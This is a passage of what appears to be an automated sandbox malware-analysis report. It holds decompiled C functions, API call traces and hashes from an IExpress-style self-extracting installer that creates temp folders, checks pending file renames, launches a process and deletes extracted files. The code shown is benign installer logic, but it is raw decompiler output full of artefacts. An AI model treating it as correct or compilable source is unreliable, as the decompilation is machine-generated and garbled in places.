                                                                      					goto L3;
                                                                      				}
                                                                      				_t30 = 1;
                                                                      				 *0x11d8a20 = 1;
                                                                      				goto L5;
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 011D171E: _vsnprintf.MSVCRT ref: 011D1750
                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D53FB
                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5402
                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D541F
                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D542B
                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5434
                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5452
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                      • API String ID: 1082909758-3862032828
                                                                      • Opcode ID: 95180def651107f5b7e6a41d6b8e255ec0528cf94ef709fed102b813845e96a3
                                                                      • Instruction ID: 9099f5f83bb7661d10fee83f32c9158d8562438af5905fdcca440c0e8941b4d9
                                                                      • Opcode Fuzzy Hash: 95180def651107f5b7e6a41d6b8e255ec0528cf94ef709fed102b813845e96a3
                                                                      • Instruction Fuzzy Hash: B211BF7170611477E72CAA26AC48FAB7A6EEFD5725F000129F66693180DF74898287A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 519 11d256d-11d257d 520 11d2583-11d2589 519->520 521 11d2622-11d2627 call 11d24e0 519->521 523 11d25e8-11d2607 RegOpenKeyExA 520->523 524 11d258b 520->524 526 11d2629-11d262f 521->526 528 11d2609-11d2620 RegQueryInfoKeyA 523->528 529 11d25e3-11d25e6 523->529 524->526 527 11d2591-11d2595 524->527 527->526 531 11d259b-11d25ba RegOpenKeyExA 527->531 530 11d25d1-11d25dd RegCloseKey 528->530 529->526 530->529 531->529 532 11d25bc-11d25cb RegQueryValueExA 531->532 532->530
                                                                      C-Code - Quality: 86%
                                                                      			E011D256D(signed int __ecx) {
                                                                      				int _v8;
                                                                      				void* _v12;
                                                                      				signed int _t13;
                                                                      				signed int _t19;
                                                                      				long _t24;
                                                                      				void* _t26;
                                                                      				int _t31;
                                                                      				void* _t34;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_push(__ecx);
                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                      				_t31 = 0;
                                                                      				if(_t13 == 0) {
                                                                      					_t31 = E011D24E0(_t26);
                                                                      				} else {
                                                                      					_t34 = _t13 - 1;
                                                                      					if(_t34 == 0) {
                                                                      						_v8 = 0;
                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                      							goto L7;
                                                                      						} else {
                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                      							goto L6;
                                                                      						}
                                                                      						L12:
                                                                      					} else {
                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                      							_v8 = 0;
                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                      							if(_t24 == 0) {
                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                      								L6:
                                                                      								asm("sbb eax, eax");
                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                      								RegCloseKey(_v12); // executed
                                                                      							}
                                                                      							L7:
                                                                      							_t31 = _v8;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t31;
                                                                      				goto L12;
                                                                      			}

                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,011D4096,011D4096,?,011D1ED3,00000001,00000000,?,?,011D4137,?), ref: 011D25B2
                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,011D4096,?,011D1ED3,00000001,00000000,?,?,011D4137,?,011D4096), ref: 011D25CB
                                                                      • RegCloseKey.KERNELBASE(?,?,011D1ED3,00000001,00000000,?,?,011D4137,?,011D4096), ref: 011D25DD
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,011D4096,011D4096,?,011D1ED3,00000001,00000000,?,?,011D4137,?), ref: 011D25FF
                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,011D4096,00000000,00000000,00000000,00000000,?,011D1ED3,00000001,00000000), ref: 011D261A
                                                                      Strings
                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 011D25F5
                                                                      • PendingFileRenameOperations, xrefs: 011D25C3
                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 011D25A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                      • API String ID: 2209512893-559176071
                                                                      • Opcode ID: 8ef94e2812f3307b9930141d6a0065e19346e1c3d18bd1bc397bb43af8240c9f
                                                                      • Instruction ID: 80466547b6b4c2a478834a6f11bd4ae7e0e8664f67d0bbbd3832773036d4b010
                                                                      • Opcode Fuzzy Hash: 8ef94e2812f3307b9930141d6a0065e19346e1c3d18bd1bc397bb43af8240c9f
                                                                      • Instruction Fuzzy Hash: 27118C35943238BBEB38DBA69C49DFBBE7CEF026A1F504065F929A2004D7304A44D6A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 533 11d6a60-11d6a91 call 11d7155 call 11d7208 GetStartupInfoW 539 11d6a93-11d6aa2 533->539 540 11d6abc-11d6abe 539->540 541 11d6aa4-11d6aa6 539->541 544 11d6abf-11d6ac5 540->544 542 11d6aaf-11d6aba Sleep 541->542 543 11d6aa8-11d6aad 541->543 542->539 543->544 545 11d6ac7-11d6acf _amsg_exit 544->545 546 11d6ad1-11d6ad7 544->546 547 11d6b0b-11d6b11 545->547 548 11d6ad9-11d6ae9 call 11d6c3f 546->548 549 11d6b05 546->549 551 11d6b2e-11d6b30 547->551 552 11d6b13-11d6b24 _initterm 547->552 553 11d6aee-11d6af2 548->553 549->547 554 11d6b3b-11d6b42 551->554 555 11d6b32-11d6b39 551->555 552->551 553->547 556 11d6af4-11d6b00 553->556 557 11d6b44-11d6b51 call 11d7060 554->557 558 11d6b67-11d6b71 554->558 555->554 560 11d6c39-11d6c3e call 11d724d 556->560 557->558 571 11d6b53-11d6b65 557->571 559 11d6b74-11d6b79 558->559 562 11d6b7b-11d6b7d 559->562 563 11d6bc5-11d6bc8 559->563 568 11d6b7f-11d6b81 562->568 569 11d6b94-11d6b98 562->569 566 11d6bca-11d6bd3 563->566 567 11d6bd6-11d6be3 _ismbblead 563->567 566->567 572 11d6be9-11d6bed 567->572 573 11d6be5-11d6be6 567->573 568->563 574 11d6b83-11d6b85 568->574 575 11d6b9a-11d6b9e 569->575 576 11d6ba0-11d6ba2 569->576 571->558 572->559 578 11d6c1e-11d6c25 572->578 573->572 574->569 579 11d6b87-11d6b8a 574->579 580 11d6ba3-11d6bbc call 11d2bfb 575->580 576->580 582 11d6c27-11d6c2d _cexit 578->582 583 11d6c32 578->583 579->569 581 11d6b8c-11d6b92 579->581 580->578 586 11d6bbe-11d6bbf exit 580->586 581->574 582->583 583->560 586->563
                                                                      C-Code - Quality: 51%
                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                      				signed int* _t25;
                                                                      				signed int _t26;
                                                                      				signed int _t29;
                                                                      				int _t30;
                                                                      				signed int _t37;
                                                                      				signed char _t41;
                                                                      				signed int _t53;
                                                                      				signed int _t54;
                                                                      				intOrPtr _t56;
                                                                      				signed int _t58;
                                                                      				signed int _t59;
                                                                      				intOrPtr* _t60;
                                                                      				void* _t62;
                                                                      				void* _t67;
                                                                      				void* _t68;
                                                                      
                                                                      				E011D7155();
                                                                      				_push(0x58);
                                                                      				_push(0x11d72b8);
                                                                      				E011D7208(__ebx, __edi, __esi);
                                                                      				 *(_t62 - 0x20) = 0;
                                                                      				GetStartupInfoW(_t62 - 0x68);
                                                                      				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                      				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                      				_t53 = 0;
                                                                      				while(1) {
                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                      					if(0 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					if(0 != _t56) {
                                                                      						Sleep(0x3e8);
                                                                      						continue;
                                                                      					} else {
                                                                      						_t58 = 1;
                                                                      						_t53 = 1;
                                                                      					}
                                                                      					L7:
                                                                      					_t67 =  *0x11d88b0 - _t58; // 0x2
                                                                      					if(_t67 != 0) {
                                                                      						__eflags =  *0x11d88b0; // 0x2
                                                                      						if(__eflags != 0) {
                                                                      							 *0x11d81e4 = _t58;
                                                                      							goto L13;
                                                                      						} else {
                                                                      							 *0x11d88b0 = _t58;
                                                                      							_t37 = E011D6C3F(0x11d10b8, 0x11d10c4); // executed
                                                                      							__eflags = _t37;
                                                                      							if(__eflags == 0) {
                                                                      								goto L13;
                                                                      							} else {
                                                                      								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                      								_t30 = 0xff;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_push(0x1f);
                                                                      						L011D6FF4();
                                                                      						L13:
                                                                      						_t68 =  *0x11d88b0 - _t58; // 0x2
                                                                      						if(_t68 == 0) {
                                                                      							_push(0x11d10b4);
                                                                      							_push(0x11d10ac);
                                                                      							L011D7202();
                                                                      							 *0x11d88b0 = 2;
                                                                      						}
                                                                      						if(_t53 == 0) {
                                                                      							 *0x11d88ac = 0;
                                                                      						}
                                                                      						_t71 =  *0x11d88b4;
                                                                      						if( *0x11d88b4 != 0 && E011D7060(_t71, 0x11d88b4) != 0) {
                                                                      							_t60 =  *0x11d88b4; // 0x0
                                                                      							 *0x11da288(0, 2, 0);
                                                                      							 *_t60();
                                                                      						}
                                                                      						_t25 = __imp___acmdln; // 0x74895b9c
                                                                      						_t59 =  *_t25;
                                                                      						 *(_t62 - 0x1c) = _t59;
                                                                      						_t54 =  *(_t62 - 0x20);
                                                                      						while(1) {
                                                                      							_t41 =  *_t59;
                                                                      							if(_t41 > 0x20) {
                                                                      								goto L32;
                                                                      							}
                                                                      							if(_t41 != 0) {
                                                                      								if(_t54 != 0) {
                                                                      									goto L32;
                                                                      								} else {
                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                      										_t59 = _t59 + 1;
                                                                      										 *(_t62 - 0x1c) = _t59;
                                                                      										_t41 =  *_t59;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                      							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                      								_t29 = 0xa;
                                                                      							} else {
                                                                      								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                      							}
                                                                      							_push(_t29);
                                                                      							_t30 = E011D2BFB(0x11d0000, 0, _t59); // executed
                                                                      							 *0x11d81e0 = _t30;
                                                                      							__eflags =  *0x11d81f8;
                                                                      							if( *0x11d81f8 == 0) {
                                                                      								exit(_t30); // executed
                                                                      								goto L32;
                                                                      							}
                                                                      							__eflags =  *0x11d81e4;
                                                                      							if( *0x11d81e4 == 0) {
                                                                      								__imp___cexit();
                                                                      								_t30 =  *0x11d81e0; // 0x0
                                                                      							}
                                                                      							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                      							goto L40;
                                                                      							L32:
                                                                      							__eflags = _t41 - 0x22;
                                                                      							if(_t41 == 0x22) {
                                                                      								__eflags = _t54;
                                                                      								_t15 = _t54 == 0;
                                                                      								__eflags = _t15;
                                                                      								_t54 = 0 | _t15;
                                                                      								 *(_t62 - 0x20) = _t54;
                                                                      							}
                                                                      							_t26 = _t41 & 0x000000ff;
                                                                      							__imp___ismbblead(_t26);
                                                                      							__eflags = _t26;
                                                                      							if(_t26 != 0) {
                                                                      								_t59 = _t59 + 1;
                                                                      								__eflags = _t59;
                                                                      								 *(_t62 - 0x1c) = _t59;
                                                                      							}
                                                                      							_t59 = _t59 + 1;
                                                                      							 *(_t62 - 0x1c) = _t59;
                                                                      						}
                                                                      					}
                                                                      					L40:
                                                                      					return E011D724D(_t30);
                                                                      				}
                                                                      				_t58 = 1;
                                                                      				__eflags = 1;
                                                                      				goto L7;
                                                                      			}


                                                                      APIs
                                                                        • Part of subcall function 011D7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 011D7182
                                                                        • Part of subcall function 011D7155: GetCurrentProcessId.KERNEL32 ref: 011D7191
                                                                        • Part of subcall function 011D7155: GetCurrentThreadId.KERNEL32 ref: 011D719A
                                                                        • Part of subcall function 011D7155: GetTickCount.KERNEL32 ref: 011D71A3
                                                                        • Part of subcall function 011D7155: QueryPerformanceCounter.KERNEL32(?), ref: 011D71B8
                                                                      • GetStartupInfoW.KERNEL32(?,011D72B8,00000058), ref: 011D6A7F
                                                                      • Sleep.KERNEL32(000003E8), ref: 011D6AB4
                                                                      • _amsg_exit.MSVCRT ref: 011D6AC9
                                                                      • _initterm.MSVCRT ref: 011D6B1D
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 011D6B49
                                                                      • exit.KERNELBASE ref: 011D6BBF
                                                                      • _ismbblead.MSVCRT ref: 011D6BDA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                      • String ID:
                                                                      • API String ID: 836923961-0
                                                                      • Opcode ID: fbbb9bfe4f9ea6017be187862019f0f550112288ab13b3797c553681327d7d7c
                                                                      • Instruction ID: dff8db7da71289a94e6bf3d03d9b9a58f50558d3e7ba3d01e4a02de16bcacab9
                                                                      • Opcode Fuzzy Hash: fbbb9bfe4f9ea6017be187862019f0f550112288ab13b3797c553681327d7d7c
                                                                      • Instruction Fuzzy Hash: 8A41E131A46365DFEB3E9F6DE805B6A7BE0FB48724F14412AE95297284CB744880CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 587 11d58c8-11d58d5 588 11d58d8-11d58dd 587->588 588->588 589 11d58df-11d58f1 LocalAlloc 588->589 590 11d5919-11d5959 call 11d1680 call 11d658a CreateFileA LocalFree 589->590 591 11d58f3-11d5901 call 11d44b9 589->591 594 11d5906-11d5910 call 11d6285 590->594 600 11d595b-11d596c CloseHandle GetFileAttributesA 590->600 591->594 601 11d5912-11d5918 594->601 600->594 602 11d596e-11d5970 600->602 602->594 603 11d5972-11d597b 602->603 603->601
                                                                      C-Code - Quality: 95%
                                                                      			E011D58C8(intOrPtr* __ecx) {
                                                                      				void* _v8;
                                                                      				intOrPtr _t6;
                                                                      				void* _t10;
                                                                      				void* _t12;
                                                                      				void* _t14;
                                                                      				signed char _t16;
                                                                      				void* _t20;
                                                                      				void* _t23;
                                                                      				intOrPtr* _t27;
                                                                      				CHAR* _t33;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t33 = __ecx;
                                                                      				_t27 = __ecx;
                                                                      				_t23 = __ecx + 1;
                                                                      				do {
                                                                      					_t6 =  *_t27;
                                                                      					_t27 = _t27 + 1;
                                                                      				} while (_t6 != 0);
                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                      				if(_t20 != 0) {
                                                                      					E011D1680(_t20, _t36, _t33);
                                                                      					E011D658A(_t20, _t36, "TMP4351$.TMP");
                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                      					_v8 = _t10;
                                                                      					LocalFree(_t20);
                                                                      					_t12 = _v8;
                                                                      					if(_t12 == 0xffffffff) {
                                                                      						goto L4;
                                                                      					} else {
                                                                      						CloseHandle(_t12);
                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                      							goto L4;
                                                                      						} else {
                                                                      							 *0x11d9124 = 0;
                                                                      							_t14 = 1;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					E011D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      					L4:
                                                                      					 *0x11d9124 = E011D6285();
                                                                      					_t14 = 0;
                                                                      				}
                                                                      				return _t14;
                                                                      			}


                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,011D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D58E7
                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,011D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5943
                                                                      • LocalFree.KERNEL32(00000000,?,011D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D594D
                                                                      • CloseHandle.KERNEL32(00000000,?,011D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D595C
                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,011D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5963
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                      • API String ID: 747627703-2139698323
                                                                      • Opcode ID: b29bf09015162da650024a8bbb003a171a573a468e6d35f5747c86e8e21faf43
                                                                      • Instruction ID: ff503d977ff566a3b1dce735e0bda97f6a7ba04234d175e54bd10df2703483a2
                                                                      • Opcode Fuzzy Hash: b29bf09015162da650024a8bbb003a171a573a468e6d35f5747c86e8e21faf43
                                                                      • Instruction Fuzzy Hash: AD1126716022203BD73C5E7EAC4DA9B7FAADF46274B000629B525D3184DB74984583A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 604 11d52b6-11d52d4 605 11d5317-11d531f 604->605 606 11d52d6 604->606 607 11d5379-11d5381 605->607 608 11d5321-11d5328 605->608 609 11d52d7-11d52e0 606->609 611 11d538c-11d53a0 call 11d6ce0 607->611 612 11d5383-11d5385 607->612 608->607 610 11d532a-11d5331 608->610 613 11d5300-11d5314 LocalFree * 2 609->613 614 11d52e2-11d52e9 609->614 610->607 617 11d5333-11d5351 call 11d1781 610->617 612->611 618 11d5387 call 11d1fe1 612->618 613->609 615 11d5316 613->615 614->613 619 11d52eb-11d52fa SetFileAttributesA DeleteFileA 614->619 615->605 624 11d535e-11d536f SetCurrentDirectoryA call 11d2390 617->624 625 11d5353-11d5359 call 11d65e8 617->625 618->611 619->613 628 11d5374 624->628 625->624 628->607
                                                                      C-Code - Quality: 74%
                                                                      			E011D52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				signed int _t9;
                                                                      				signed int _t11;
                                                                      				void* _t21;
                                                                      				void* _t29;
                                                                      				CHAR** _t31;
                                                                      				void* _t32;
                                                                      				signed int _t33;
                                                                      
                                                                      				_t28 = __edi;
                                                                      				_t22 = __ecx;
                                                                      				_t21 = __ebx;
                                                                      				_t9 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t9 ^ _t33;
                                                                      				_push(__esi);
                                                                      				_t31 =  *0x11d91e0; // 0xec7270
                                                                      				if(_t31 != 0) {
                                                                      					_push(__edi);
                                                                      					do {
                                                                      						_t29 = _t31;
                                                                      						if( *0x11d8a24 == 0 &&  *0x11d9a30 == 0) {
                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                      							DeleteFileA( *_t31); // executed
                                                                      						}
                                                                      						_t31 = _t31[1];
                                                                      						LocalFree( *_t29);
                                                                      						LocalFree(_t29);
                                                                      					} while (_t31 != 0);
                                                                      					_pop(_t28);
                                                                      				}
                                                                      				_t11 =  *0x11d8a20; // 0x0
                                                                      				_pop(_t32);
                                                                      				if(_t11 != 0 &&  *0x11d8a24 == 0 &&  *0x11d9a30 == 0) {
                                                                      					_push(_t22);
                                                                      					E011D1781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                      					if(( *0x11d9a34 & 0x00000020) != 0) {
                                                                      						E011D65E8( &_v268);
                                                                      					}
                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                      					_t22 =  &_v268;
                                                                      					E011D2390( &_v268);
                                                                      					_t11 =  *0x11d8a20; // 0x0
                                                                      				}
                                                                      				if( *0x11d9a40 != 1 && _t11 != 0) {
                                                                      					_t11 = E011D1FE1(_t22); // executed
                                                                      				}
                                                                      				 *0x11d8a20 =  *0x11d8a20 & 0x00000000;
                                                                      				return E011D6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                      			}













                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(00EC7270,00000080,?,00000000), ref: 011D52F2
                                                                      • DeleteFileA.KERNELBASE(00EC7270), ref: 011D52FA
                                                                      • LocalFree.KERNEL32(00EC7270,?,00000000), ref: 011D5305
                                                                      • LocalFree.KERNEL32(00EC7270), ref: 011D530C
                                                                      • SetCurrentDirectoryA.KERNELBASE(011D11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 011D5363
                                                                      Strings
                                                                      • pr, xrefs: 011D52CC
                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 011D5334
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$pr
                                                                      • API String ID: 2833751637-931104669
                                                                      • Opcode ID: 1efb539cbbb66bd42b268cc15345c80497be0171dd9631ab1878c3f6926c2003
                                                                      • Instruction ID: e1e00f853e61df4ebc11870a8de968efbe880b37b145baade193ac0751780679
                                                                      • Opcode Fuzzy Hash: 1efb539cbbb66bd42b268cc15345c80497be0171dd9631ab1878c3f6926c2003
                                                                      • Instruction Fuzzy Hash: 2C21C032907229EBDB7DDF28E848B697BB5BB14718F040279E96253188CFB458C4CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 656 11d3fef-11d4010 657 11d410a-11d411a call 11d6ce0 656->657 658 11d4016-11d403b CreateProcessA 656->658 659 11d40c4-11d4101 call 11d6285 GetLastError FormatMessageA call 11d44b9 658->659 660 11d4041-11d406e WaitForSingleObject GetExitCodeProcess 658->660 674 11d4106 659->674 663 11d4091 call 11d411b 660->663 664 11d4070-11d4077 660->664 669 11d4096-11d40b8 CloseHandle * 2 663->669 664->663 668 11d4079-11d407b 664->668 668->663 671 11d407d-11d4089 668->671 672 11d4108 669->672 673 11d40ba-11d40c0 669->673 671->663 675 11d408b 671->675 672->657 673->672 676 11d40c2 673->676 674->672 675->663 676->674
                                                                      C-Code - Quality: 84%
                                                                      			E011D3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v524;
                                                                      				long _v528;
                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t20;
                                                                      				void* _t22;
                                                                      				int _t25;
                                                                      				intOrPtr* _t39;
                                                                      				signed int _t44;
                                                                      				void* _t49;
                                                                      				signed int _t50;
                                                                      				intOrPtr _t53;
                                                                      
                                                                      				_t45 = __edx;
                                                                      				_t20 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t20 ^ _t50;
                                                                      				_t39 = __ecx;
                                                                      				_t49 = 1;
                                                                      				_t22 = 0;
                                                                      				if(__ecx == 0) {
                                                                      					L13:
                                                                      					return E011D6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                      				}
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                      				if(_t25 == 0) {
                                                                      					 *0x11d9124 = E011D6285();
                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                      					_t45 = 0x4c4;
